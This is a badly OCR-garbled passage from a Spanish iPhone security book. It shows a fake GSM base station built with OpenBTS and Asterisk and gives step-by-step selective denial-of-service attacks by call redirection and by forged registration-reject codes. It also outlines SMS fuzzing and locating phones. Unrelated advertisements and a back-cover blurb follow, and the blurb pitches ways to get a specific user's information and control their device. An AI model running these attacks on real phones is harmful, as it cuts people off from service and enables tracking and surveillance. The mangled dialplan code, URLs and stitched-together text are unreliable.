utilizando  las  iníiaestiTLCturas  propuestas.  Una  recopilación  de  posibles  aLaques  y  la  teoría  subyacente 
tras  los  mismos  pueden  cu ct mirarse  en:  hUp://w\vmtaddong.com/üocs/RooíedCon20I2-\^uevas_ 
escenanos_de_útaque_GS M_GPRS.pdf 

A  continuación  se  desenben  posibles  vías  de  impleuncnLación  de  estos  ataques  de  denegación  de 
servicio  que  pueden  ser  demostrados  en  entornos  controlados. 


Ataque  de  denegación  de  servicio  selectivo  hasado  en  redirección 
de  llamada 

Uno  de  los  ataques,  que  puede  ser  impiementado  con  la  infracstruciura  propuesta,  consiste  en  la 
redirección  de  la  llamada  saliente  del  terminal  victima  a  una  locución  de  tonos  que  haga  pensar  a  la 
víctima  que  tiene  sendeio  aunque  no  1[>  tiene.  Con  este  método  se  consigue  que  el  terminal  víctima 
sufra  una  denegación  de  servicio  transparente  (no  se  percibe  ningún  síntoma  de  que  no  se  tiene 
servicio)  y  selectiva  (puede  atacai^e  un  tenninal  en  concreto  y  otro  no). 

Una  posible  fomia  de  implemcnlar  el  ataque  consistiría  en  realizar  la  siguiente  modificación  en  la 
configuración  del  contexto  [phones]  del  dtalplafiO: 


exlti-'i:  “> 

,  r , 

.  írO-o  1  f  { CALLErs_D  ínuHi3  ) 

:=  1001]  rnedos) 

ftxt.er.  — 

_X. 

f  n. 

rAriSv;er  C) 

exter.  => 

X. 

f  n , 

r  Uinging ( ^ 

ex  Leí-  -> 

_X. 

1  n, 

UaA  i  t  ( Z.C  ) 

;  Walt 

ZO  eecüíLds 

exr.fir.  — > 

_x. 

/  u, 

,B\isy  { ) 

;  theri 

hiisy 

exTeri 

X, 

/n, 

,  HajigUp  ( ) 

;  then 

hang-  up 

ex“eu  => 

X. 

í noctlis)  ,  UcOp  ()  ; 

Nota:  Corno  se  puede  ver,  el  ataque  de  denegación  de  servicio  puede  impleinentarse 
de  forma  totalmente  selectiva,  además  de  ser  totalmente  transparente  para  el  usuario. 


Capítulo  XI L  Ataques  GSM~GPRS  a  íPhor}e 


295 


JNota:  La  coiifigumcióti  proput^Mia  hace  uso  de  los  recursos  por  defecto  de  Ásterisk, 
Sería  posible  grabar  coalqiiier  tipo  de  tono,  locución,  etcétera,  y  personalizar  LoLal- 
mente  esta  prueba  de  concepto. 


Ataque  de  denegación  de  servicio  selectivo  basado  en  códigos  de 
rechazo  de  registro 

El  segundo  altujine  de  denEgación  de  sendeio  consigue  que  el  terminal  víctima  quede  en  un  cKludo 
inválido  (sin  comunicación J  hasta  que  el  móvil  se  reariaiique.  La  tccnica  consiste  en  enviar  un 
código  de  rechazo  del  registro  del  terminal  vícLima  que  la  indique  que  su  SIM  no  es  válida.  Ya  que 
en  GSM  no  existe  aatenLicHción  del  operador,  el  terminal  victima  está  forzado  a  actuar  según  c¡^s 
indicaciones. 

Se  puede  conseguir  este  electo  mediante  la  ejecución  de  las  siguientes  acciones; 

-  M  o  di  fi  car  el  parámetro  de  OpenB  TS  Contro  i  L  UK  ünpro  ion  edR  ejtc  tCause  al  v  alor  d  e 

OxO:?  (Illegal  MS). 

-  Paiui^  la  emisión  de  OpenBTS y  esperar  a  que  el  móvil  víctima  pierda  servicio, 

Dcsprovisionar  en  el  Ásterisk  el  terminal  víctima  {para  que  sea  rechazado  cuando  intente 
el  registro). 

-  Volver  a  arrancar  OpíenBTS. 

Cuando  el  móvil  intente  registrarse  de  nuevo  en  la  estación  base  falsa  recibirá  eí  código  de  rechazo 
que  le  protlucírá  el  efecto  descrito.  En  la  siguiente  fígura  puede  verse  que  un  iPhone^  tras  ser 
rechazado  con  un  código  0x02  {¡MSI  ünknown  in  MLR),  0x03  (plegal  MS)  ó  0x06  {IHegal  AÍE), 
queda  en  estado  ‘"No  Service'’  basta  que  se  rearranca  el  dispositivo; 


Unagejj  J2J4:  A  tuque  DoS  u  un  iPhone  mediante  f.E7  Refect  CaiL\^  Code-i. 
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Una  descripción  detallada  de  los  í’uiidamentos  del  ataque  puede  encontrarse  en:  htíp://ww\\^Jaddong. 
com/docs/Ho  oted Ci^  nlOI  2-  Nu  evmesce}2arloii_de_aíaque  GSM  GFR  S.pdf.  Además  es  p  os  i  ble 
encOTtrar  demosfraciones  en:  http://vimeo.com/47i9i77B 


Nota:  El  ataque  es  totalmente  selectivo  (pues  se  conLRíla  a  través  de  la  gestión  de 
usuarios  de  la  inti'aestnictura). 


Nida:  La  caractLTfsíiL'a  dircrerictai  de  este  ataque  es  que  presenta  cierta  persistencia, 
en  el  sentido  de  que  me  luso  cuando  el  atacante  ha  dejadíí  de  estar  presente  k  denega¬ 
ción  persiste  hasta  que  el  usuario  reinicia  su  Tenninah  _ 


7.  Otros  posibles  ataques 

La  infraes  truc  tura  descrita  puede  utilizarse  pata  realizar  otro  tipo  de  pruebas  de  concepto  o 
investigación  sobre  las  comunicaciones  móviles.  A  continuación  se  presentan  algunas  sugerencias 
de  usos  adicionales  de  k  írdiaestructura  que  se  ha  propuesto. 

Fuzziiig  sobre  la  pila  de  protocolos  GSM^GPRS  y  ataques  a  la  banda  base 

Las  infraesmictuTus  basadas  en  estación  base  falsa  pueden  utilizarse  para  realizar  sobre  la 

pila  de  protocolos  GS.Vl.  Existe  una  variedad  de  trabajos  al  respecto^*  donde  se  estudia  la  robustez 
de  difereiites  paites  del  conjunto  de  protocolos  mediante  esta  técnica.  Algunos  de  estos  trabajos  han 
1 1  e  V  ado  a  en  c  t  >n  trar  v  ulncrab  i  1  i  dudes  expío  L  ables . 

Esta  técnica  abre  la  puerta  a  ataques  que  no  dependen  de  k  fortaleza  de  los  métodos  de  autenticación 
y  establecmiiento  de  cifrado  y  por  tanto  es  teóricamente  viable  para  cualquier  generación  de 
lecnulogía  móvil,  incluyendo  3G  y  LTE- 

Ataques  mediante  SMSs 

Una  estación  base  falsa  proporciona  un  mecanismo  ideal  para  realizar  pruebas  de  ataque  sobre 
diversas  modalidades  de  SMS: 

-  SMSs  tipo  flash. 


3  I  “FiL¿2Í.ig  rke  GSM  protocoFl  hrtp:/M'Ww,goog¡c..p:s/url?m=!4Írcí=JÁjq=openbts^)2Gíes¡caIÍ%20 
fiizi-iftgiísowcé=y^-ebf^^  ved^OCEIQFjA  B  urí =htfp  %3A  %2F%2b  m.  fé  I%2Fp  u  bíi^h  %2Fp¿}gé'i'%2F 

5  78936%2F.wHptie-  brimo-fjuaí-  briniojiond pdféc^i  -  irró UL  G204  WQhOe;  mrOgC w.Y&ij,,s;g=.^  FQJ  CNE5é  ÚPkf 
g}3CgUoJJOí-27^MyvxJh  ^v¿^bvm=b  l';  4  i?48874^d.  7X}4 

32  attacks:  Remóte  Exploitaíton  orMemoo'  Comiptions  m  Cedular 

Prof OCü  I  Stacks'' .  kíip://\VY:!W.  googh,  eshir¡?sa “/<£  q  ope/jh  íá  %?OtesicttU%  20 
fuzzmgc2.so  urce — Vi^’e-bÁ  ed—  yfnI—OC.Eo  QFjA  Ct^iu'¡=híips*2h3A^'^2F%2F ui-v  w 

userth  (írg%2F^y^íem  'yn2Ffiies%2FcOffMnce  %2F\Vü0tJ  2  %2t'wooii  2-Jii^ai24. 

pdfdí  e¡—  trrñ  UL  G204 WQk  QerÁ^o  DgO>  vSiii'íg  ~Á  FQj  CNGgD  y'9Gp  luj  YEbF8  7?.  GyyJlQ_&hvm~h\'Ai248874,  ti  ZG4 
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-  SMSs  con  VCards, 
i¥AF  Fi4sh  messüf^es. 

M  M  S  { M ulílmec! i  a  M ^ssagíng  Services) . 

Dato  Dú\vpxload. 

Fn  h  actual  idad  5  ya  se  han  realizado  trabajos  que  deinueslmn  cómo  se  puede  utilizar  la  infraestnictura 
que  se  describe  en  este  capítulo  para  realizar  Jíízzitig  sobre  los  protocolos  transportad  os  oiedianLc 
SMS-^ 

Locaii/adún  geográfica  de  terminales  móviles 

La  localización  geográfica  de  tenninales  móviles  es  una  lúncionalidad  de  los  proveedores  de 
servicio  de  telefonía  móviL  recogida  en  la  norma  GSM  bajo  el  noirihrc  do  1  CS  (Locatíoíi  Servicesy"^. 
Hsta  ñincioiialidad  está  definida  etm  el  objetiví)  de  que  los  operadores  puedan  ubicar  la  posición 
geográfica  de  los  icrminales  móviles  a  los  que  se  está  dando  semeio,  con  múltiples  propósitos. 

Es  p[>síblc  aprovechar  parte  de  esta  especiñcacióu  para  conocer  la  ubicación  de  nn  terminal  móvil 
al  que  se  le  está  atacando  con  la  infraeslructura  de  estación  base  falsa.  El  protocolo  RRLF  (Radío 
Resoíijve  Locatíon  Sei-íices\  definido  en  la  iioniia  GSM  como  parte  del  conjuino  de  proLocotus  T.CS 
{Location  Services),  permite  a  la  estación  base  interrogar  al  cualquier  lerminal  registrado  sobre  su 
posición  geográfica,  utilizando  pam  ello  los  canales  de  semlización  GSiVEf  El  terminal,  si  soporta 
RRLP^%  contestará  con  suposición  geográfica,  que  puede  ser  obtenida  a  través  de  suGPS  o  mediante 
medí ei unes  de  las  señales  provenientes  de  la  red.  Tanto  OpenBTS  e{>mo  OpenBSC  soportan  este 
proiocolo  por  lo  que  pueden  ser  usadas  con  este  propósiLo^f 

Aún  sin  liacer  uso  de  las  espeeifieaeinnes  de  TCS  (imagínese  por  ejemplo  el  caso  de  un  dispositivo 
móvil  que  haya  deshabilitado  intencionadamente  todos  sus  servicios  de  local  i/ación),  es  posible 
determinar  la  posición  de  un  temiinal  móvil  registrado  en  ima  estación  base  falsa.  Cuando  un 
terminal  está  registrado  en  una  esLación  base  y  establecido  un  canal  de  radío,  envía  información 
acerca  del  retardo  y  potencia  percibida  de  la  señal.  Por  otro  lado,  la  estación  base  también  percibe 
el  retaitlo  y  la  potencia  de  la  serial  dcl  móvil.  Obteniendo  esta  información  desde  varios  puntos 
distintos  y/o  corribinaruio  esta  información  con  la  proporcionada  por  una  antena  direccional,  sería 
posible  establecer  ia  posición  exacta  de  un  móvil  que  se  encuentre  en  el  alcance  de  la  estación  base. 
Algunos  trabajos  ya  han  sido  realizados  al  rcspecto^^. 


33  M  S  Vil  biemb  i1  ily  Anitlysi  s  un  h  camrc  P  lione  £ 

hííp  :/A\^vy¿  ish.  ta-h^rlii'i.  4/pnf^hedjíhe.^es/J^fco  Go¿de/áiphfíi_go¡de.pílf 

34  mrp :/S\'  .vil’.  3giyp. org/pp/Specs/hím I-mFí/22 07 i. htri i 

3  í  h  Up  ://s  t'cíirfiy.  ürg/imcA  vItí/RHLF 

36  Aunque  el  soponc  a  RRí  P  no  es  obiigalorio,  lu  njayvria  dt?  lob  dispositivos  móviles  actuales  lü  soportan. 
3  htip  ://wt!s:hr  ijeíArac/rai^gepíib  ti  c/wiki/frlp 

.3  hftp  2/20 1 1 .  híiL^.  }u/m¿k'x.pkp/Lis  tl^LocaíñígjiJJSM^húm_m_a_given  atsa  witho  ut  uFer  un  í 
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Recover  Messages 

Recover  Messages  ss  un  servicio  que  pemiite  examinar  y  recuperar  datos  de  aplicaciones  que  utilizan 
S(2fáre  como  base  de  ílatos.  Dichas  aplicaciones  están  incluidas  en  sinartphones  iPhone  y 
priDcipalmeiite,  ejemplos  de  ello  son  ff7¿aJsApp,  LJ/íe,  Spo¿Bros  etcétera. 

Gracias  a  Recover  Á^essages  es  posible  inspeccionar  y  recuperar  ia  información  de  ficheros  SQL  Re 
faciiiLados  por  el  usuario,  que  serán  LraLados  en  íiijcstros  sistemas  o  en  los  de  nuestros  proveedores 
de  sistemas  de  forma  automática,  y  totalmente  confidencial,  incluyendo  por  supuesto  las  medidas 
de  seguridad  pertinentes. 

Tanto  la  incorporación  de  fíclieros  SQZtíe  como  la  obtención  de  los  datos  que  dichos  ficheros 
almacenan,  son  guiados  paso  a  paso  con  asistentes  desde  ia  propia  web,  lo  que  hace  muy  sencilla  la 
utilización  de  este  servicio  pionero. 

El  servicio  tiene  dos  modal idades: 

-  Gratuito.  En  este  caso  el  usuario  tendrá  funcionalidades  limitadas,  siendo  posible 

únicamente  acceder  a  los  mensajes  de  los  dispositivos  iPkone  y  /índmid. 

-  Con  licencia.  En  este  caso  el  usuaiio  tendrá  todas  las  funcionalidades  del  servdcio,  que 

incluye  además  de  las  incluidas  en  la  modalidad  grauiita,  la  posibilidad  de  recuperar  Mensajes 
SMS  y  Bniails  de  iPhone  y  AndnRd,  además  de  los  ai  chivos  utilizados  con  otras  aplicaciones 
de  iFRone  como  SpotBws  yLme, 


El  servicio  está  disponible  cr  castellano  y  en  ingles  en  hííp://recavermess¿2ge^s.cí?m 


l^antaila  principaJ  de 
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Gálica  Electrónico 


■'Calicó  Electrónico”  se  ha  coiiveitido  en  la  serie  de  ariiinaciím  Fía^ih  más  famosa  de  España.  En 
clave  de  hnmor  y  con  una  animación  de  gran  calidad,  Calicó  Electrónico  es  un  superhéroe  "aspañol" 
alejado  totalmente  dd  patrón  establecido  en  los  superhéroes:  Gálico  es  bajito,  gordo,  y  no  tiene 
ningúii  poder.  Lo  que  sí  tiene  es  la  fíjacEÓn  de  salvar  a  su  ciudad  "Rlcctrónico  City'’  de  cualquier  mal* 


El  origen  de  ''Cálico  Electrónico”  fue  una  campaña  de  márkelíng  de  una  web.  Nti  ííbsLanLc.  el  exito 
que  Luvcí  superó  todas  1as  expectativas  y  se  creó  una  identidad  propia*  “CáEco  Electrónico'*  ha  hecho 
famoso  a  su  creador,  Níkodem(},  que  a  partir  de  en  tí  mees  creó  un  estudio  de  animación  llamado 
Níkodemo  Ariimation.  iras  los  éxitos  iniciales,  la  serie  Luvo  3  temporadas  de  6  capítulos  cada  una, 
incluyéndose  en  ellas  unas  tomas  talsas,  al  estilo  de  las  películas  con  actores  reales.  Además  de 
los  capítulos  oficiales  se  hicieron  también  capítulos  especiales,  y  una  serie  paralela  llamada  ''Los 
huértanos  electrónicos”* 


En  la  acLualitkd  ha  fans  de  'tüálico  EiectrónÍco''pueden  acceder  a  multitud  de  productos  de  la  serie, 
ya  que  se  lian  generado  nuevos  capítulos  y  so  han  reeditado  los  antiguos  en  alta  calidad,  dichos 
capítulos  están  disponibles  para  dispositivos  iPhorie,  Wukíows  Phone,  Windows  8  o  AndrokL 


ICO  EJLEC 

temporada! 

Tíl«pc>fLiCtll  5 


r  Lí^fttpor^da  i 


TeníEínrnri^í '! 

-  -‘iM.'ilil  _  _ 


Aplicación  de  ■gálico  electrónico"  para  MminvAs  Fhiint^. 


También  ha  aurnentadí)  la  demanda  de  productos  de  Calicó,  como  cómics,  DVDs  con  los  capítulos 
de  la  serie,  muñecos,  camisetas,  tazas,  barajas  de  cartas  y  uii  largo  etcétera. 
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Otra  tío  vedad  son  ías  "Tiras  Cálice",  que  se  currespoiiden  a  unas  tiras  cómicas  de  3  o  4  viñetas,  al 
estilo  de  otros  personajes  conocidos  como  Garíield  o  M afalda.  Dichas  tiras  aparecen  cada  miércoles 
y  también  se  pueden  ver  en  los  dispositivos  mencionados.  Además  los  fans  tienen  la  posibilidad 
de  enviar  sus  fotos  disiiazados  de  Cátíeo,  o  enviar  sus  propios  dibujos  de  este  peculiar  superhéioe. 


fcjempk»  dt  'Tlui  Cáiicu". 


Para  que  i  os  fans  estén  in  formados,  se  mantienen  varios  canales  abiertos  sobre  d  producto: 

-  TSvitter:  I¡nps;//nvüierxom/CaIicoOfkia¡ 

-  Google  Plus:  hítps://pIus.goog¡e. conv! 071 8605 7 ¡2842296 J 644/posís 

-  Tu  e  n  ti :  A  itp://www.  íiien  ti.  com/cañcoeiecínm  ico 
Voutu  be :  ¡}rrp://\^rm\\youníbe  cún7/calk^úeíecovmcúhd 

F ae  eb  nuk :  http.s  ://Mm^v.  faceho  oL  coni/CüiicoEiecimji  icoOftc  ial 


Además  de  todo  esto,  y  para  mantener  vivo  el  proyecto,  se  tian  realizado  Lrabajos  en  el  mundo  de  la 
publicidad,  visitado  una  docena  de  coiigiesos  y  festivales  de  cómic,  se  ha  cerrado  la  ilustración  de 
un  libro  que  pronto  saldrá  a  la  venta  y  se  ha  firmado  un  nuevo  cómic  con  Ediciones  Babyhn  que 
está  a  punto  de  ver  la  luz. 

Toda  la  información  acerca  de  ‘"Cáüco  Hiectrónico”  y  de  tos  productos  mencionados  está  disponible 
en  h  iíp:// tvvi  ■  w.  cal  ico  eiecíroníco.  com/ 


A  día  de  hoy  se  han  vendido  más  de  500  mülonés  de  dispositivos  iOS  y  aunque  la  seguridad 
del  sistema  ha  meíorado  con  cada  versión  todavía  se  pueden  encontrar  vulnerabilidades  a 
explotar,  Hay  que  recordar  que  el  punto  más  débil  en  un  sistema  san  los  usuarias,,  una  con¬ 
figuración  por  defecto  o  incorrecta,  la  falta  de  actualización  del  sistema,  o  simplemente  el 
desconocimiento  del  usuario  propician  y  hacen  más  que  probable  un  ataque  exitoso  al; 
sistema,  con  todo  ei  peligro  que  ello  conlleva. 

Las  auditorias  de  seguridad  en  empresas  cada  ve2  se  encuentran  con  más  dispos8:lvo3  iOS 
entre  sus  objetivos,  Las  políticas  de  BVOD  (Bring  Your  Own  Device^  hacen  que  cada  vez  . más 
empleados  utilicen  sus  íPhone  o  iPad  en  sus  puestos  de  trabajo,  con  sus  aplicaciones  corpo¬ 
rativas,  y  desde  las  redes  de  las  empresas,  ío  que  hace  que  haya  que  pensar  en  ellos  corw 
posibles  riesgos  de  seguridad. 

En  este  libro  se  han  juntado  un  nutrido  grupo  de  expertos  en  seguridad  en  la  mats^ía  pam 
recopilar  en  un  texto,  todas  las  formas  de  atacar  un  termina!  iPhone  o  iPad  de  un  usuEarío 
determinado.  Utilizando  metodologías  aplicables  a  cualquier  sistema,  como  tos  ataques 
MÍTM  {Man  In  The  Middle),  conexión  a  puntos  de  acceso  suplantados  (AP  Rogue), 
ataques  Cilent-Side,  ataques  en  redes  Wíreiess,  ataques  en  local,  ataques  exclusivos  de  la 
?  plataforma  i  OS  como  JailOwnMe,  e!  robo  de  datos  a  través  del  backup  que  se  hace  «n  Obud  ; 
y  cómo  utilizar  las  técnicas  de  jaiíbreak  en  provecho  de  un  auditor,  son  ai^nas  de  tPS  ' 
aspectos  que  se  tratan. 

También  se  presenta  una  visión  global  sobre  la  arquitectura  dé!  sistema  operativo  de  Apple 
guiado  por  pruebas  de  concepto,  con  un  enfoque  eminentemente  práctico,  que  ayudaran  al 
lector  a  entender  los  riesgos  a  los  que  estári  sujetos  este  tipo  de  dispositivos,  e  incÉBEó  a  : 
replicar  las  pruebas  en  su  propia  máquina.  Además  se  incluyen  múltipt^  iPhgne  Local 
Tricks,  pequeños  trucos  a  realizar  en  un  dispositivo  iPhone  teniendo  acceso  feieó  a  esté,, 
mediante  los  que  se  podrá  consultar  la  agenda  de  contactos  mediaiHe  Siri,  o  ver 
imágenes  obtenidas  con  la  cámara  del  dispositivo. 

Después  de  leer  este  libro,  si  un  déterminadq  usuario  tiene  un  iPhone  o  on  Ped,  seguro  que' ; 
ai  lector  se  le  Ocurren  muchas  formas  de  conseguir  ia  información  que  en  é!  se  g^nde  s  de 
controlar  lo  que  con  él  se  hace. 


Otros  libros  de  Ox WORD 


